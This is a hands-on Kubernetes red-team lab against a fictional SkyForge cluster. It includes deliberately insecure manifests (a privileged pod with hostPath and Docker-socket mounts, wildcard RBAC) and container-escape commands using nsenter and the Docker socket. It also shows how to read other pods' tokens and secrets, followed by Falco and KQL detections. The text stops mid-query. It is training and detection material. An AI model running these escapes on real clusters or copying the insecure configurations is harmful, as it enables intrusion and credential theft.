Lab 26: Container & Kubernetes Red Teaming¶
Chapters: 20 — Cloud Attack & Defense Playbook | 46 — Cloud & Container Red Teaming
Difficulty: ⭐⭐⭐⭐ Expert
Estimated Time: 4–5 hours
Prerequisites: Chapter 20, Chapter 46, Lab 13 (Cloud Red Team), basic Docker/Kubernetes knowledge
Overview¶
In this lab you will:
- Escape a privileged container to the underlying host node using capability abuse, nsenter, and mount exploitation — then pivot to access other pods' secrets
- Exploit overly permissive Kubernetes RBAC bindings to escalate from a limited service account to cluster-admin privileges
- Extract secrets directly from etcd on the control plane, decode them, and demonstrate why encryption at rest is critical
- Attack an Istio service mesh by bypassing mTLS, hijacking traffic with VirtualService manipulation, and performing sidecar injection attacks
- Compromise the CI/CD-to-cluster supply chain through vulnerable base images, trojanized containers, image pull policy abuse, and admission control bypass
- Write KQL and SPL detection queries for every attack technique — both for cloud-native (AKS/EKS) audit logs and on-premise SIEM ingestion
- Map all findings to MITRE ATT&CK techniques with defensive countermeasures
Synthetic Data Only
All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) or RFC 1918 (10.0.0.0/8, 172.16.0.0/12) reserved ranges. All domains use *.example.com. No real applications, real credentials, or real infrastructure are referenced. All credentials shown as REDACTED. This lab is for defensive education only — never use these techniques against systems you do not own or without explicit written authorization.
Scenario¶
Engagement Brief — Helios Cloud Technologies
Organization: Helios Cloud Technologies (fictional)
Platform: SkyForge — cloud-native microservices platform for enterprise data analytics
Cluster: skyforge-prod.k8s.example.com (SYNTHETIC)
Registry: registry.helios.example.com (SYNTHETIC)
API Server: https://203.0.113.40:6443 (SYNTHETIC — RFC 5737)
Node Network: 10.60.0.0/16 (SYNTHETIC)
Pod Network: 10.244.0.0/16 (SYNTHETIC)
Service Network: 10.96.0.0/12 (SYNTHETIC)
Cloud Provider: AWS EKS (SYNTHETIC — Account ID 987654321098)
Service Mesh: Istio 1.21 with mTLS enabled
Engagement Type: Full-scope Kubernetes red team assessment
Scope: All Kubernetes workloads, container runtime, RBAC configuration, etcd, service mesh, CI/CD pipeline, container registry
Out of Scope: AWS control plane (IAM), DNS infrastructure, DDoS testing, physical infrastructure
Test Window: 2026-04-07 08:00 – 2026-04-11 20:00 UTC
Emergency Contact: soc@helios.example.com (SYNTHETIC)
Summary: Helios Cloud Technologies runs its SkyForge analytics platform on Kubernetes (AWS EKS) with Istio service mesh. Following a board-mandated security review after a competitor suffered a major container breakout incident, Helios has engaged your red team to simulate a realistic adversary with initial pod-level access. Your mission: escalate from a compromised application pod to full cluster compromise, demonstrating each attack path and the detection opportunities defenders have at every stage. The security team will use your findings to harden their Kubernetes posture, improve runtime monitoring, and validate their Falco rule coverage.
Certification Relevance¶
Certification Mapping
This lab maps to objectives in the following certifications:
| Certification | Relevant Domains |
|---|---|
| CKS (Certified Kubernetes Security Specialist) | Cluster Setup (10%), System Hardening (15%), Minimize Microservice Vulnerabilities (20%), Supply Chain Security (20%), Monitoring/Logging/Runtime Security (20%) |
| OSCP / OSEP | Privilege escalation, lateral movement, container breakout |
| AWS Certified Security — Specialty (SCS-C02) | Domain 3: Infrastructure Protection, Domain 4: IAM |
| CompTIA PenTest+ (PT0-003) | Domain 3: Attacks and Exploits, Domain 4: Reporting and Communication |
| GIAC Cloud Penetration Tester (GCPN) | Container and orchestration attacks |
MITRE ATT&CK Mapping¶
Throughout this lab, findings map to the following techniques:
| Technique ID | Name | Tactic | Exercise |
|---|---|---|---|
| T1611 | Escape to Host | Privilege Escalation | Exercise 1 |
| T1610 | Deploy Container | Execution | Exercise 2 |
| T1078.004 | Valid Accounts: Cloud Accounts | Persistence, Privilege Escalation | Exercise 2 |
| T1552.007 | Unsecured Credentials: Container API | Credential Access | Exercise 3 |
| T1552.001 | Unsecured Credentials: Credentials in Files | Credential Access | Exercise 3 |
| T1557 | Adversary-in-the-Middle | Collection | Exercise 4 |
| T1071.001 | Application Layer Protocol: Web Protocols | Command and Control | Exercise 4 |
| T1195.002 | Supply Chain Compromise: Compromise Software Supply Chain | Initial Access | Exercise 5 |
| T1525 | Implant Internal Image | Persistence | Exercise 5 |
| T1613 | Container and Resource Discovery | Discovery | Exercises 1–5 |
Prerequisites¶
Required Tools¶
| Tool | Purpose | Version |
|---|---|---|
| kubectl | Kubernetes CLI | 1.29+ |
| docker | Container runtime | 24.x+ |
| minikube or kind | Local Kubernetes cluster | Latest |
| trivy | Container image vulnerability scanner | 0.50+ |
| falco | Runtime security monitoring | 0.37+ |
| kube-hunter | Kubernetes penetration testing | 0.6+ |
| peirates | Kubernetes post-exploitation tool | 1.1+ |
| helm | Kubernetes package manager | 3.14+ |
| istioctl | Istio service mesh CLI | 1.21+ |
| etcdctl | etcd CLI client | 3.5+ |
| jq | JSON parsing | 1.7+ |
| curl | HTTP requests | 8.x+ |
| nsenter | Namespace entry (Linux) | util-linux |
| crictl | Container runtime interface CLI | 1.29+ |
Test Accounts (Synthetic)¶
| Role | Username | Token | Namespace | Notes |
|---|---|---|---|---|
| Compromised App Pod | data-processor-sa | REDACTED | skyforge-prod | Initial foothold — limited SA |
| CI/CD Service Account | deploy-pipeline-sa | REDACTED | skyforge-ci | Deployment permissions |
| Monitoring Agent | monitoring-sa | REDACTED | monitoring | Read-only cluster-wide |
| Cluster Admin | admin | REDACTED | * | Full access (goal) |
| Auditor | auditor | REDACTED | * | Read-only (for validation) |
Lab Environment Setup¶
# Create a local Kubernetes cluster with kind (SYNTHETIC)
# kind-config.yaml enables multiple nodes for realistic attack surface
$ cat <<'EOF' > kind-config.yaml
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
extraMounts:
- hostPath: /var/run/docker.sock
containerPath: /var/run/docker.sock
- role: worker
extraPortMappings:
- containerPort: 30080
hostPort: 30080
- role: worker
- role: worker
EOF
$ kind create cluster --name skyforge-lab --config kind-config.yaml
Creating cluster "skyforge-lab" ...
✓ Ensuring node image (kindest/node:v1.29.2)
✓ Preparing nodes 📦 📦 📦 📦
✓ Writing configuration 📝
✓ Starting control-plane 🕹️
✓ Installing CNI 🔌
✓ Installing StorageClass 💾
✓ Joining worker nodes 🚜
Set kubectl context to "kind-skyforge-lab"
# Verify cluster is running
$ kubectl cluster-info --context kind-skyforge-lab
Kubernetes control plane is running at https://127.0.0.1:38291
CoreDNS is running at https://127.0.0.1:38291/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy
# Create namespaces
$ kubectl create namespace skyforge-prod
namespace/skyforge-prod created
$ kubectl create namespace skyforge-ci
namespace/skyforge-ci created
$ kubectl create namespace monitoring
namespace/monitoring created
$ kubectl create namespace istio-system
namespace/istio-system created
$ kubectl create namespace skyforge-staging
namespace/skyforge-staging created
Deploy Lab Workloads (Synthetic)¶
# Deploy the vulnerable data-processor pod (initial foothold)
$ cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: ServiceAccount
metadata:
name: data-processor-sa
namespace: skyforge-prod
---
apiVersion: v1
kind: Pod
metadata:
name: data-processor
namespace: skyforge-prod
labels:
app: data-processor
version: v2.1.0
spec:
serviceAccountName: data-processor-sa
containers:
- name: processor
image: registry.helios.example.com/skyforge/data-processor:2.1.0
securityContext:
privileged: true
capabilities:
add: ["SYS_ADMIN", "SYS_PTRACE", "NET_ADMIN"]
volumeMounts:
- name: host-fs
mountPath: /host
- name: docker-sock
mountPath: /var/run/docker.sock
env:
- name: DB_CONNECTION
value: "postgresql://analytics:REDACTED@10.60.2.10:5432/skyforge"
- name: REDIS_URL
value: "redis://10.60.2.20:6379"
volumes:
- name: host-fs
hostPath:
path: /
- name: docker-sock
hostPath:
path: /var/run/docker.sock
EOF
pod/data-processor created
# Deploy additional microservices
$ cat <<'EOF' | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
name: auth-service
namespace: skyforge-prod
spec:
replicas: 2
selector:
matchLabels:
app: auth-service
template:
metadata:
labels:
app: auth-service
version: v1.8.3
spec:
serviceAccountName: auth-service-sa
containers:
- name: auth
image: registry.helios.example.com/skyforge/auth-service:1.8.3
ports:
- containerPort: 8080
env:
- name: JWT_SECRET
valueFrom:
secretKeyRef:
name: auth-secrets
key: jwt-secret
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: api-gateway
namespace: skyforge-prod
spec:
replicas: 3
selector:
matchLabels:
app: api-gateway
template:
metadata:
labels:
app: api-gateway
version: v3.2.1
spec:
containers:
- name: gateway
image: registry.helios.example.com/skyforge/api-gateway:3.2.1
ports:
- containerPort: 443
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: report-engine
namespace: skyforge-prod
spec:
replicas: 1
selector:
matchLabels:
app: report-engine
template:
metadata:
labels:
app: report-engine
version: v1.4.0
spec:
containers:
- name: reports
image: registry.helios.example.com/skyforge/report-engine:1.4.0
ports:
- containerPort: 8443
EOF
deployment.apps/auth-service created
deployment.apps/api-gateway created
deployment.apps/report-engine created
# Create secrets used by the workloads
$ kubectl create secret generic auth-secrets \
--from-literal=jwt-secret=REDACTED \
--from-literal=oauth-client-secret=REDACTED \
-n skyforge-prod
secret/auth-secrets created
$ kubectl create secret generic db-credentials \
--from-literal=username=skyforge_admin \
--from-literal=password=REDACTED \
--from-literal=connection-string="postgresql://skyforge_admin:REDACTED@10.60.2.10:5432/skyforge" \
-n skyforge-prod
secret/db-credentials created
$ kubectl create secret generic tls-certs \
--from-literal=tls.crt=REDACTED-CERTIFICATE-DATA \
--from-literal=tls.key=REDACTED-PRIVATE-KEY-DATA \
-n skyforge-prod
secret/tls-certs created
$ kubectl create secret generic registry-creds \
--from-literal=.dockerconfigjson='{"auths":{"registry.helios.example.com":{"auth":"REDACTED"}}}' \
--type=kubernetes.io/dockerconfigjson \
-n skyforge-ci
secret/registry-creds created
Deploy Intentionally Vulnerable RBAC (Synthetic)¶
# Overly permissive ClusterRole — common misconfiguration
$ cat <<'EOF' | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: skyforge-developer
rules:
- apiGroups: [""]
resources: ["pods", "pods/exec", "pods/log", "services", "configmaps"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list"]
- apiGroups: ["apps"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["clusterroles", "clusterrolebindings", "roles", "rolebindings"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: skyforge-developer-binding
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: skyforge-developer
subjects:
- kind: ServiceAccount
name: data-processor-sa
namespace: skyforge-prod
---
# Dangerous: CI/CD SA with escalation path
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: ci-deployer
rules:
- apiGroups: [""]
resources: ["*"]
verbs: ["*"]
- apiGroups: ["apps"]
resources: ["*"]
verbs: ["*"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["*"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: ci-deployer-binding
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: ci-deployer
subjects:
- kind: ServiceAccount
name: deploy-pipeline-sa
namespace: skyforge-ci
EOF
clusterrole.rbac.authorization.k8s.io/skyforge-developer created
clusterrolebinding.rbac.authorization.k8s.io/skyforge-developer-binding created
clusterrole.rbac.authorization.k8s.io/ci-deployer created
clusterrolebinding.rbac.authorization.k8s.io/ci-deployer-binding created
Lab Architecture (Synthetic)¶
┌───────────────────────────────────────────────────────────────────────────────────┐
│ Helios Cloud — SkyForge Kubernetes Architecture │
│ │
│ ┌─────────────────────────────────────────────────────────────────────────────┐ │
│ │ AWS EKS Cluster (SYNTHETIC) │ │
│ │ API Server: 203.0.113.40:6443 │ │
│ │ etcd: 203.0.113.41:2379 │ │
│ │ │ │
│ │ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │
│ │ │ Node 1 │ │ Node 2 │ │ Node 3 │ │ │
│ │ │ 10.60.1.10 │ │ 10.60.1.20 │ │ 10.60.1.30 │ │ │
│ │ │ │ │ │ │ │ │ │
│ │ │ ┌──────────────┐│ │ ┌──────────────┐│ │ ┌──────────────┐│ │ │
│ │ │ │data-processor││ │ │ auth-service ││ │ │ report-engine││ │ │
│ │ │ │ (FOOTHOLD) ││ │ │ (2 replicas) ││ │ │ ││ │ │
│ │ │ │ privileged: ││ │ │ ││ │ │ ││ │ │
│ │ │ │ true ││ │ └──────────────┘│ │ └──────────────┘│ │ │
│ │ │ └──────────────┘│ │ ┌──────────────┐│ │ ┌──────────────┐│ │ │
│ │ │ ┌──────────────┐│ │ │ api-gateway ││ │ │ notif-svc ││ │ │
│ │ │ │ analytics- ││ │ │ (3 replicas) ││ │ │ ││ │ │
│ │ │ │ worker ││ │ │ ││ │ │ ││ │ │
│ │ │ └──────────────┘│ │ └──────────────┘│ │ └──────────────┘│ │ │
│ │ └─────────────────┘ └─────────────────┘ └─────────────────┘ │ │
│ │ │ │
│ │ ┌─────────────────────────────────────────────────────┐ │ │
│ │ │ Istio Service Mesh — mTLS enabled │ │ │
│ │ │ istiod: 10.96.0.50 | ingress-gw: 203.0.113.42 │ │ │
│ │ └─────────────────────────────────────────────────────┘ │ │
│ │ │ │
│ │ ┌─────────────────────────────────────────────────────┐ │ │
│ │ │ Data Services │ │ │
│ │ │ PostgreSQL: 10.60.2.10 | Redis: 10.60.2.20 │ │ │
│ │ │ Kafka: 10.60.2.30 | Vault: 10.60.2.40 │ │ │
│ │ │ etcd: 203.0.113.41:2379 (control plane) │ │ │
│ │ └─────────────────────────────────────────────────────┘ │ │
│ └─────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ ┌───────────────────────┐ ┌────────────────────────┐ ┌──────────────────────┐ │
│ │ Container Registry │ │ CI/CD Pipeline │ │ Monitoring Stack │ │
│ │ registry.helios │ │ Jenkins: 10.60.3.10 │ │ Prometheus/Grafana │ │
│ │ .example.com │ │ ArgoCD: 10.60.3.20 │ │ Falco / Fluentd │ │
│ └───────────────────────┘ └────────────────────────┘ └──────────────────────┘ │
└───────────────────────────────────────────────────────────────────────────────────┘
Exercise 1: Container Escape¶
Time Estimate: 60–75 minutes
ATT&CK Mapping: T1611 (Escape to Host), T1613 (Container and Resource Discovery)
Objectives¶
- Enumerate container capabilities, mounted volumes, and security context from inside a compromised pod
- Identify host filesystem access via /proc/1/root and mounted hostPath volumes
- Escape to the underlying host node using nsenter and capability exploitation
- Access other pods' secrets and data from the host level
- Understand the detection surface at every stage of the escape
Background¶
Container escape is one of the most critical attack paths in Kubernetes environments. When a pod runs with privileged: true or has SYS_ADMIN capability, the container's isolation boundary becomes paper-thin. An attacker who gains code execution inside such a pod can reach the underlying node, and from there, potentially the entire cluster.
In this exercise, you are simulating an attacker who has gained remote code execution inside the data-processor pod through a deserialization vulnerability in the analytics pipeline. The pod was deployed by a well-meaning SRE team who needed host-level access for performance monitoring — a common real-world misconfiguration.
Step 1.1: Initial Reconnaissance Inside the Pod¶
# You have a shell inside the compromised data-processor pod
# First: identify where you are and what you have
$ whoami
root
$ hostname
data-processor
$ cat /etc/os-release | head -3
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
Enumerate the Kubernetes environment:
# Check if this is a Kubernetes pod
$ env | grep -i kube
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_SERVICE_PORT=443
KUBERNETES_SERVICE_PORT_HTTPS=443
# Locate the service account token (auto-mounted)
$ ls -la /var/run/secrets/kubernetes.io/serviceaccount/
total 4
drwxrwxrwt 3 root root 140 Apr 7 08:15 .
drwxr-xr-x 3 root root 4096 Apr 7 08:15 ..
lrwxrwxrwx 1 root root 13 Apr 7 08:15 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Apr 7 08:15 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Apr 7 08:15 token -> ..data/token
$ cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
skyforge-prod
# Store the token for later use
$ export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ export CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
$ export APISERVER=https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}
Step 1.2: Enumerate Container Capabilities¶
# Check if we're running as privileged
$ cat /proc/1/status | grep -i cap
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
# Decode capabilities using capsh
$ capsh --decode=0000003fffffffff
0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,
cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,
cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,
cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,
cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,
cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,
cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,
cap_wake_alarm,cap_block_suspend,cap_audit_read
Finding: Full Capabilities Enabled
The pod has all Linux capabilities including SYS_ADMIN, SYS_PTRACE, NET_ADMIN, and SYS_MODULE. This is equivalent to running as root on the host. Combined with privileged: true, this container has no meaningful isolation from the host kernel.
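If capsh is not available in a stripped-down container image, the same decoding can be done with shell arithmetic alone. A minimal sketch — the cap_in_mask helper is illustrative; the bit numbers come from linux/capability.h (CAP_SYS_MODULE=16, CAP_SYS_PTRACE=19, CAP_SYS_ADMIN=21):

```shell
# Minimal sketch, assuming no capsh in the image: decode a CapEff mask with
# shell arithmetic. cap_in_mask is a hypothetical helper; capability bit
# numbers are taken from linux/capability.h.
cap_in_mask() {
  # Shift the mask right by the capability number and test the low bit.
  [ $(( ($1 >> $2) & 1 )) -eq 1 ]
}

MASK=0x0000003fffffffff   # CapEff value read from /proc/1/status above
for pair in "16 CAP_SYS_MODULE" "19 CAP_SYS_PTRACE" "21 CAP_SYS_ADMIN"; do
  set -- $pair
  cap_in_mask "$MASK" "$1" && echo "$2 present"
done
# → CAP_SYS_MODULE present
# → CAP_SYS_PTRACE present
# → CAP_SYS_ADMIN present
```

Any capability of interest can be checked the same way by its bit number; a fully-set 38-bit mask like this one is itself a strong escape indicator.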
# Check security context — is this pod privileged?
$ cat /proc/1/cgroup
0::/system.slice/containerd.service
# Check if we can see host PID namespace
$ ls /proc/ | head -20
1
2
3
...
47
48
50
...
# Verify — can we see host processes? (privileged + hostPID would show them)
$ ps aux | head -10
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 5340 3020 ? Ss 08:15 0:00 /bin/sh -c python3 /app/processor.py
root 15 0.5 2.1 52340 42000 ? Sl 08:15 0:12 python3 /app/processor.py
root 89 0.0 0.0 2388 696 pts/0 Ss 08:30 0:00 /bin/sh
root 95 0.0 0.0 7060 1580 pts/0 R+ 08:31 0:00 ps aux
Step 1.3: Identify Mounted Volumes¶
# Enumerate mount points
$ mount | grep -E "(host|docker|containerd)"
/dev/sda1 on /host type ext4 (rw,relatime)
tmpfs on /var/run/docker.sock type tmpfs (rw,nosuid,nodev,noexec)
# The host root filesystem is mounted at /host!
$ ls /host/
bin dev home lib lib64 media opt root sbin srv tmp var
boot etc host lib32 lost+found mnt proc run snap sys usr
# We also have the Docker socket
$ ls -la /var/run/docker.sock
srw-rw---- 1 root 998 0 Apr 7 08:00 /var/run/docker.sock
# Check /proc/1/root — can we reach the host init process?
$ ls /proc/1/root/
bin dev home lib lib64 media opt root sbin srv tmp var
boot etc host lib32 lost+found mnt proc run snap sys usr
Finding: Host Filesystem Mounted
The host root filesystem (/) is mounted at /host with read-write permissions. The Docker socket is also mounted inside the container. These two misconfigurations together provide trivial host escape.
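The two risky mounts can also be spotted mechanically rather than by eyeballing mount output. A hedged sketch that scans a mount table for escape-enabling entries — in a live pod you would read /proc/mounts; mounts.sample below is a synthetic stand-in reproducing the findings above:

```shell
# Hedged sketch: flag mount entries that commonly enable container escape.
# mounts.sample is a synthetic stand-in for /proc/mounts.
cat > mounts.sample <<'EOF'
overlay / overlay rw,relatime 0 0
/dev/sda1 /host ext4 rw,relatime 0 0
tmpfs /var/run/docker.sock tmpfs rw,nosuid,nodev,noexec 0 0
EOF

# Field 2 of each mount entry is the mount point.
awk '$2 == "/host" || $2 ~ /\/host\// || $2 ~ /docker\.sock$/ {
  print "RISKY MOUNT:", $2
}' mounts.sample
# → RISKY MOUNT: /host
# → RISKY MOUNT: /var/run/docker.sock
```

The same one-liner, pointed at /proc/mounts, makes a useful triage step in any compromised-pod assessment.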
Step 1.4: Escape to Host Using nsenter¶
# Method 1: nsenter — enter host namespaces from the container
# This works because we have SYS_ADMIN + SYS_PTRACE capabilities
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# nsenter targets PID 1 on the host (the init process)
$ nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# After nsenter, we are now operating in the HOST's namespace
$ hostname
ip-10-60-1-10.ec2.internal
$ whoami
root
$ cat /etc/hostname
ip-10-60-1-10.ec2.internal
# Verify we're on the host by checking for kubelet
$ ps aux | grep kubelet | head -3
root 1247 3.2 4.5 1987432 91240 ? Ssl 08:00 0:45 /usr/bin/kubelet \
--config=/var/lib/kubelet/config.yaml \
--container-runtime-endpoint=unix:///run/containerd/containerd.sock \
--kubeconfig=/etc/kubernetes/kubelet.conf \
--node-ip=10.60.1.10 \
--v=2
# We have escaped the container and are now root on the node!
$ id
uid=0(root) gid=0(root) groups=0(root)
Critical: Container Escape Achieved
Using nsenter targeting PID 1 with --mount --uts --ipc --net --pid flags, the attacker enters the host's namespaces. This is the canonical privileged container escape. From here, the attacker has root access to the Kubernetes node.
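A sturdier confirmation than checking hostname is comparing namespace inodes: if your mount-namespace inode matches PID 1's, you share the host's namespace. A sketch, assuming a Linux procfs (/proc/1/ns may be unreadable without root):

```shell
# Hedged sketch: compare our mount-namespace inode with PID 1's.
# Identical inodes mean we share PID 1's mount namespace — either the
# escape succeeded or we were never isolated in the first place.
self_ns=$(readlink /proc/self/ns/mnt)
init_ns=$(readlink /proc/1/ns/mnt 2>/dev/null || echo "unreadable")
if [ "$self_ns" = "$init_ns" ]; then
  echo "shared mount namespace with PID 1"
else
  echo "isolated from PID 1's mount namespace"
fi
```

Run before and after the nsenter step, this gives an unambiguous before/after signal that the boundary was crossed.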
Step 1.5: Pivot from Host to Other Pods' Secrets¶
# Now on the host node — enumerate all containers running on this node
$ crictl ps
CONTAINER IMAGE CREATED STATE NAME POD ID
a1b2c3d4e5f6 registry... 2 hours ago Running data-processor f1e2d3c4b5
b2c3d4e5f6a1 registry... 2 hours ago Running analytics-worker g2f3e4d5c6
c3d4e5f6a1b2 registry... 2 hours ago Running auth-service h3g4f5e6d7
# Inspect another pod's filesystem
$ crictl inspect b2c3d4e5f6a1 | jq '.info.runtimeSpec.mounts[] | select(.destination | contains("secret"))'
{
"destination": "/var/run/secrets/kubernetes.io/serviceaccount",
"type": "bind",
"source": "/var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~projected/kube-api-access-xxxxx",
"options": ["rbind", "rprivate", "ro"]
}
# Read another pod's service account token
$ cat /var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~projected/kube-api-access-xxxxx/token
eyJhbGciOiJSUzI1NiIsImtpZCI6InN5bnRoZXRpYy1rZXkifQ.SYNTHETIC_TOKEN_ANALYTICS_WORKER.REDACTED_SIGNATURE
# Access another pod's environment variables (may contain secrets)
$ crictl inspect b2c3d4e5f6a1 | jq '.info.runtimeSpec.process.env[]' | grep -i -E "(pass|secret|key|token)"
"DB_PASSWORD=REDACTED"
"API_KEY=REDACTED"
"ANALYTICS_TOKEN=REDACTED"
# Read mounted secret volumes from other pods
$ find /var/lib/kubelet/pods/ -path "*/secrets/*" -type f 2>/dev/null
/var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~secret/db-creds/username
/var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~secret/db-creds/password
/var/lib/kubelet/pods/h3g4f5e6d7/volumes/kubernetes.io~secret/auth-secrets/jwt-secret
/var/lib/kubelet/pods/h3g4f5e6d7/volumes/kubernetes.io~secret/auth-secrets/oauth-client-secret
$ cat /var/lib/kubelet/pods/h3g4f5e6d7/volumes/kubernetes.io~secret/auth-secrets/jwt-secret
REDACTED
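The first segment of a stolen service-account JWT is base64url-encoded JSON and can be decoded offline to confirm the signing algorithm and key ID. A sketch using only POSIX tools on the synthetic token above — the padding fix-up is needed because JWT segments omit trailing `=`:

```shell
# Sketch: decode the header segment of the stolen (synthetic) JWT offline.
# JWT segments are base64url with no '=' padding, so restore it first.
TOKEN='eyJhbGciOiJSUzI1NiIsImtpZCI6InN5bnRoZXRpYy1rZXkifQ.SYNTHETIC_TOKEN_ANALYTICS_WORKER.REDACTED_SIGNATURE'
header=$(printf '%s' "$TOKEN" | cut -d. -f1 | tr '_-' '/+')
case $(( ${#header} % 4 )) in
  2) header="${header}==" ;;
  3) header="${header}="  ;;
esac
printf '%s\n' "$header" | base64 -d; echo
# → {"alg":"RS256","kid":"synthetic-key"}
```

The payload segment decodes the same way and reveals the bound service account, namespace, audience, and expiry — all useful for planning the next pivot without touching the API server.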
Finding: Cross-Pod Secret Theft via Host Access
After escaping to the host, all pod secrets on that node are accessible via the kubelet's local volume mounts. This is because Kubernetes mounts secret volumes as tmpfs directories on the node filesystem, readable by root. This demonstrates why node compromise = compromise of all workloads on that node.
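The kubelet layout described above is exactly what node-level file-integrity monitoring should watch. An illustrative sketch that rebuilds the directory structure in a temp dir (pod-uid-1/pod-uid-2 and the secret names are synthetic) and runs the same hunt:

```shell
# Illustrative sketch of the kubelet secret-volume layout.
# Real prefix: /var/lib/kubelet/pods/<pod-uid>/volumes/kubernetes.io~secret/
root=$(mktemp -d)
mkdir -p "$root/pod-uid-1/volumes/kubernetes.io~secret/db-creds"
mkdir -p "$root/pod-uid-2/volumes/kubernetes.io~secret/auth-secrets"
printf 'REDACTED' > "$root/pod-uid-1/volumes/kubernetes.io~secret/db-creds/password"
printf 'REDACTED' > "$root/pod-uid-2/volumes/kubernetes.io~secret/auth-secrets/jwt-secret"

# Same hunt as on the real node, rooted at the sample tree:
find "$root" -path '*kubernetes.io~secret*' -type f | sort | sed "s|$root|/var/lib/kubelet/pods|"
# → /var/lib/kubelet/pods/pod-uid-1/volumes/kubernetes.io~secret/db-creds/password
# → /var/lib/kubelet/pods/pod-uid-2/volumes/kubernetes.io~secret/auth-secrets/jwt-secret
```

Defenders can alert on any read of files under `kubernetes.io~secret` by processes other than kubelet and the owning container runtime.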
Step 1.6: Alternative Escape — Docker Socket¶
# Method 2: Docker socket escape (if mounted)
# Back inside the original container
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Use the mounted Docker socket to create a privileged container on the host
$ docker -H unix:///var/run/docker.sock run -it --privileged \
--net=host --pid=host --ipc=host \
-v /:/host \
registry.helios.example.com/skyforge/base-image:latest \
chroot /host /bin/bash
# This creates a new container with host namespace access
# effectively giving a root shell on the host
Detection: Container Escape¶
Falco Rules¶
# Falco rule: Detect nsenter execution (container escape indicator)
- rule: Container Escape via nsenter
desc: Detects nsenter being used from within a container to enter host namespaces
condition: >
spawned_process and container and proc.name = "nsenter"
and proc.args contains "--target 1"
output: >
nsenter executed inside container targeting host PID namespace
(user=%user.name container=%container.name image=%container.image.repository
command=%proc.cmdline pod=%k8s.pod.name ns=%k8s.ns.name)
priority: CRITICAL
tags: [container, escape, T1611]
# Falco rule: Detect Docker socket access from container
- rule: Docker Socket Accessed from Container
desc: A process inside a container accessed the Docker socket
condition: >
container and (fd.name = /var/run/docker.sock or
fd.name = /run/docker.sock) and
evt.type in (connect, sendto)
output: >
Docker socket accessed from container
(user=%user.name container=%container.name command=%proc.cmdline
pod=%k8s.pod.name ns=%k8s.ns.name)
priority: CRITICAL
tags: [container, escape, docker_socket]
# Falco rule: Detect host filesystem read from container
- rule: Sensitive Host Path Read from Container
desc: Container process reading sensitive host paths via mounted volumes
condition: >
container and open_read and
(fd.name startswith /host/etc/ or
fd.name startswith /host/var/lib/kubelet/ or
fd.name startswith /host/root/)
output: >
Sensitive host path accessed from container
(file=%fd.name user=%user.name container=%container.name
command=%proc.cmdline pod=%k8s.pod.name)
priority: HIGH
tags: [container, file_access, host_path]
# Falco rule: Detect chroot from container
- rule: Chroot Detected in Container
desc: chroot called from within a container — potential escape attempt
condition: >
container and evt.type = chroot
output: >
chroot detected in container (user=%user.name container=%container.name
command=%proc.cmdline pod=%k8s.pod.name ns=%k8s.ns.name)
priority: CRITICAL
tags: [container, escape, chroot]
KQL Detection (Azure Kubernetes Service / Sentinel)¶
// KQL: Detect privileged container creation in AKS
AzureDiagnostics
| where Category == "kube-audit"
| where log_s has "create" and log_s has "pods"
| extend AuditLog = parse_json(log_s)
| extend PodSpec = AuditLog.requestObject.spec
| where PodSpec.containers[0].securityContext.privileged == true
or PodSpec.containers[0].securityContext.capabilities.add has "SYS_ADMIN"
| project TimeGenerated,
User = AuditLog.user.username,
Namespace = AuditLog.objectRef.namespace,
